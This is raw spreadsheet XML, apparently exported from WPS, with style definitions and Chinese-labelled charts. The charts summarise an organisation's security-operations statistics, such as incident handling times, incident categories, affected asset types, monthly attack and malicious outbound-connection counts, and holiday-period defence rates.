    <xf numFmtId="0" fontId="0" fillId="0" borderId="23" xfId="0" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="14" borderId="41" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="181" fontId="0" fillId="0" borderId="30" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="41" xfId="0" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="30" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="32" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="40" xfId="0" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="10" fontId="0" fillId="14" borderId="30" xfId="0" applyNumberFormat="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="42" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="36" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="42" xfId="0" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="10" fontId="0" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="179" fontId="0" fillId="0" borderId="30" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="17" fontId="0" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="30" xfId="0" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="14" fontId="0" fillId="0" borderId="34" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="2" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="23" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="33" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="34" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="32" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="17" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="32" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="2" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="22" fillId="0" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="22" fillId="0" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="38" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="22" fillId="0" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="20" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="20" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="20" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="20" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="21" borderId="30" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="21" borderId="31" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="21" borderId="32" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="180" fontId="0" fillId="14" borderId="2" xfId="0" applyNumberFormat="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="23" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="14" borderId="2" xfId="0" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="9" fontId="0" fillId="14" borderId="2" xfId="0" applyNumberFormat="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="34" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="17" fontId="0" fillId="0" borderId="36" xfId="0" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="180" fontId="0" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="181" fontId="0" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="22" borderId="0" xfId="0" applyFill="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="2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strike val="0"/>
        <color rgb="FFFF0000"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <strike val="0"/>
        <color theme="8"/>
      </font>
    </dxf>
  </dxfs>
  <tableStyles count="0" defaultTableStyle="TableStyleMedium2" defaultPivotStyle="PivotStyleLight16"/>
  <colors>
    <mruColors>
      <color rgb="001F7C99"/>
      <color rgb="0070E3E1"/>
      <color rgb="00103C66"/>
      <color rgb="0000D860"/>
      <color rgb="00EB2E09"/>
      <color rgb="00EA9B1E"/>
      <color rgb="00EAD21D"/>
      <color rgb="00005A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14410134600158"/>
          <c:y val="0.197183098591549"/>
          <c:w val="0.909527579836368"/>
          <c:h val="0.643213828425096"/>
        </c:manualLayout>
      </c:layout>
      <c:barChart>
        <c:barDir val="col"/>
        <c:grouping val="clustered"/>
        <c:varyColors val="0"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>"平均处置时间（分钟）"</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>平均处置时间（分钟）</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数据统计!$F$53:$F$57</c:f>
              <c:strCache>
                <c:ptCount val="5"/>
                <c:pt idx="0">
                  <c:v>识别</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>响应</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>遏制</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>处置</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>闭环</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>数据统计!$G$53:$G$57</c:f>
              <c:numCache>
                <c:formatCode>0.00_ </c:formatCode>
                <c:ptCount val="5"/>
                <c:pt idx="0">
                  <c:v>5.11666666666667</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>13.9841666666667</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>13.9841666666667</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>28937.155</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>36717.1425</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="1"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="246"/>
        <c:overlap val="-28"/>
        <c:axId val="590885613"/>
        <c:axId val="82692506"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="59088561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692506"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="82692506"/>
        <c:scaling>
          <c:orientation val="minMax"/>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90885613"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="between"/>
      </c:valAx>
      <c:spPr>
        <a:noFill/>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst/>
      </c:spPr>
    </c:plotArea>
    <c:plotVisOnly val="1"/>
    <c:dispBlanksAs val="gap"/>
    <c:showDLblsOverMax val="0"/>
    <c:extLst>
      <c:ext uri="{0b15fc19-7d7d-44ad-8c2d-2c3a37ce22c3}">
        <chartProps xmlns="https://web.wps.cn/et/2018/main" chartId="{3d5d30ce-219a-4490-83bb-714c99ab7e67}"/>
      </c:ext>
    </c:extLst>
  </c:chart>
  <c:spPr>
    <a:noFill/>
    <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
      <a:noFill/>
      <a:prstDash val="solid"/>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c:explosion val="0"/>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spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr lang="zh-CN" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="bg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0"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="1"/>
            <c:showBubbleSize val="0"/>
            <c:separator>
</c:separator>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数据统计!$C$53:$C$57</c:f>
              <c:strCache>
                <c:ptCount val="5"/>
                <c:pt idx="0">
                  <c:v>渗透框架</c:v>
                </c:pt>
                <c:pt idx="1" c:formatCode="mmm\-yy">
                  <c:v>木马</c:v>
                </c:pt>
                <c:pt idx="2" c:formatCode="mmm\-yy">
                  <c:v>代理工具</c:v>
                </c:pt>
                <c:pt idx="3" c:formatCode="mmm\-yy">
                  <c:v>挖矿</c:v>
                </c:pt>
                <c:pt idx="4" c:formatCode="mmm\-yy">
                  <c:v>账号安全</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>数据统计!$D$53:$D$57</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="5"/>
                <c:pt idx="0">
                  <c:v>4</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>1</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>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05c95858-a390-4aea-8285-e933c03dec93}"/>
      </c:ext>
    </c:extLst>
  </c:chart>
  <c:spPr>
    <a:noFill/>
    <a:ln w="6350" cap="flat" cmpd="sng" algn="ctr">
      <a:noFill/>
      <a:round/>
    </a:ln>
    <a:effectLst/>
  </c:spPr>
  <c:txPr>
    <a:bodyPr/>
    <a:lstStyle/>
    <a:p>
      <a:pPr>
        <a:defRPr lang="zh-CN">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数据统计!$F$64:$F$68</c:f>
              <c:strCache>
                <c:ptCount val="5"/>
                <c:pt idx="0">
                  <c:v>服务器</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>终端</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>网络设备</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>安全设备</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>物联网设备</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>数据统计!$G$64:$G$68</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="5"/>
                <c:pt idx="0">
                  <c:v>160</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>950</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>68</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>27</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>1250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c54a07e1-0b93-45aa-9746-48d7f373133c}"/>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数据统计!$B$95</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>外部攻击数</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数据统计!$C$94:$N$94</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数据统计!$C$95:$N$95</c:f>
              <c:numCache>
                <c:formatCode>0\.0,"万"</c:formatCode>
                <c:ptCount val="12"/>
                <c:pt idx="0">
                  <c:v>6729</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>5323</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>5940</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>34095</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>6990</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>8813</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>4270</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>4506</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>数据统计!$B$96</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>恶意外联数</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数据统计!$C$94:$N$94</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数据统计!$C$96:$N$96</c:f>
              <c:numCache>
                <c:formatCode>0\.0,"万"</c:formatCode>
                <c:ptCount val="12"/>
                <c:pt idx="0">
                  <c:v>145428</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>134496</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>165515</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>292379</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>220881</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>176312</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>214511</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>82013</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="1"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:marker val="0"/>
        <c:smooth val="0"/>
        <c:axId val="829985891"/>
        <c:axId val="617127009"/>
      </c:lineChart>
      <c:dateAx>
        <c:axId val="8299858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617127009"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:baseTimeUnit val="days"/>
      </c:dateAx>
      <c:valAx>
        <c:axId val="617127009"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="1"/>
        <c:axPos val="l"/>
        <c:numFmt formatCode="0\.0,&quot;万&quot;"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9985891"/>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c581b2f-f2a3-47c8-87d0-4ff823d59681}"/>
      </c:ext>
    </c:extLst>
  </c:chart>
  <c:spPr>
    <a:noFill/>
    <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
      <a:noFill/>
      <a:round/>
    </a:ln>
    <a:effectLst/>
  </c:spPr>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重要时期安全态势对比</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </c:rich>
      </c:tx>
      <c:layout/>
      <c:overlay val="0"/>
      <c:spPr>
        <a:noFill/>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst/>
      </c:spPr>
    </c:title>
    <c:autoTitleDeleted val="0"/>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:grouping val="clustered"/>
        <c:varyColors val="0"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>"日均攻击数"</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>日均攻击数</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:invertIfNegative val="0"/>
          <c:dLbls>
            <c:delete val="1"/>
          </c:dLbls>
          <c:cat>
            <c:numRef>
              <c:f>数据统计!#REF!</c:f>
              <c:numCache>
                <c:ptCount val="0"/>
              </c:numCache>
            </c:numRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>数据统计!#REF!</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>1</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="219"/>
        <c:overlap val="-27"/>
        <c:axId val="452361593"/>
        <c:axId val="478519395"/>
      </c:barChart>
      <c:lineChart>
        <c:grouping val="standard"/>
        <c:varyColors val="0"/>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>"防御率"</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>防御率</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln w="28575" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="00D860"/>
              </a:solidFill>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:marker>
            <c:symbol val="none"/>
          </c:marker>
          <c:dLbls>
            <c:delete val="1"/>
          </c:dLbls>
          <c:cat>
            <c:numRef>
              <c:f>数据统计!#REF!</c:f>
              <c:numCache>
                <c:ptCount val="0"/>
              </c:numCache>
            </c:numRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>数据统计!#REF!</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>1</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:marker val="0"/>
        <c:smooth val="0"/>
        <c:axId val="725296953"/>
        <c:axId val="406196429"/>
      </c:lineChart>
      <c:catAx>
        <c:axId val="45236159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78519395"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="4785193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52361593"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="between"/>
      </c:valAx>
      <c:catAx>
        <c:axId val="725296953"/>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6196429"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="406196429"/>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25296953"/>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305ffc5-d9cf-43f5-83f9-93c24faf9c15}"/>
      </c:ext>
    </c:extLst>
  </c:chart>
  <c:spPr>
    <a:noFill/>
    <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
      <a:noFill/>
      <a:round/>
    </a:ln>
    <a:effectLst/>
  </c:spPr>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数据统计!#REF!</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">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数据统计!#REF!</c:f>
              <c:numCache>
                <c:ptCount val="0"/>
              </c:numCache>
            </c:numRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>数据统计!#REF!</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>1</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="1"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="246"/>
        <c:overlap val="-28"/>
        <c:axId val="170593429"/>
        <c:axId val="280355219"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="17059342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0355219"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="2803552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059342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331f88c-2de5-4721-af0e-94242e7abbd7}"/>
      </c:ext>
    </c:extLst>
  </c:chart>
  <c:spPr>
    <a:noFill/>
    <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
      <a:noFill/>
      <a:round/>
    </a:ln>
    <a:effectLst/>
  </c:spPr>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数据统计!$G$102</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>日均攻击数</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent6"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:invertIfNegative val="0"/>
          <c:dLbls>
            <c:delete val="1"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>数据统计!$F$103:$F$109</c:f>
              <c:strCache>
                <c:ptCount val="7"/>
                <c:pt idx="0">
                  <c:v>中秋（25/9/15-9/17）</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>国庆（25/10/1-10/8）</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>元旦（26/1/1-1/3）</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>春节（26/2/10-2/25）</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>数据统计!$G$103:$G$109</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="7"/>
                <c:pt idx="0">
                  <c:v>9623</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>28655</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>3461</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>16440</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="219"/>
        <c:overlap val="-27"/>
        <c:axId val="432151878"/>
        <c:axId val="821662473"/>
      </c:barChart>
      <c:lineChart>
        <c:grouping val="standard"/>
        <c:varyColors val="0"/>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>数据统计!$H$102</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>防御率</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln w="28575" cap="rnd">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:marker>
            <c:symbol val="none"/>
          </c:marker>
          <c:dLbls>
            <c:delete val="1"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>数据统计!$F$103:$F$109</c:f>
              <c:strCache>
                <c:ptCount val="7"/>
                <c:pt idx="0">
                  <c:v>中秋（25/9/15-9/17）</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>国庆（25/10/1-10/8）</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>元旦（26/1/1-1/3）</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>春节（26/2/10-2/25）</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>数据统计!$H$103:$H$109</c:f>
              <c:numCache>
                <c:formatCode>0%</c:formatCode>
                <c:ptCount val="7"/>
                <c:pt idx="0">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>1</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:marker val="0"/>
        <c:smooth val="0"/>
        <c:axId val="92195734"/>
        <c:axId val="609123975"/>
      </c:lineChart>
      <c:catAx>
        <c:axId val="43215187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1662473"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="82166247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2151878"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="between"/>
      </c:valAx>
      <c:catAx>
        <c:axId val="9219573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09123975"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="609123975"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="r"/>
        <c:numFmt formatCode="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195734"/>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f874fe5-ce66-4e1a-98a4-969a24fda2b4}"/>
      </c:ext>
    </c:extLst>
  </c:chart>
  <c:spPr>
    <a:no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数据统计!$D$79</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>总数</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数据统计!$C$80:$C$82</c:f>
              <c:strCache>
                <c:ptCount val="3"/>
                <c:pt idx="0">
                  <c:v>高危漏洞</c:v>
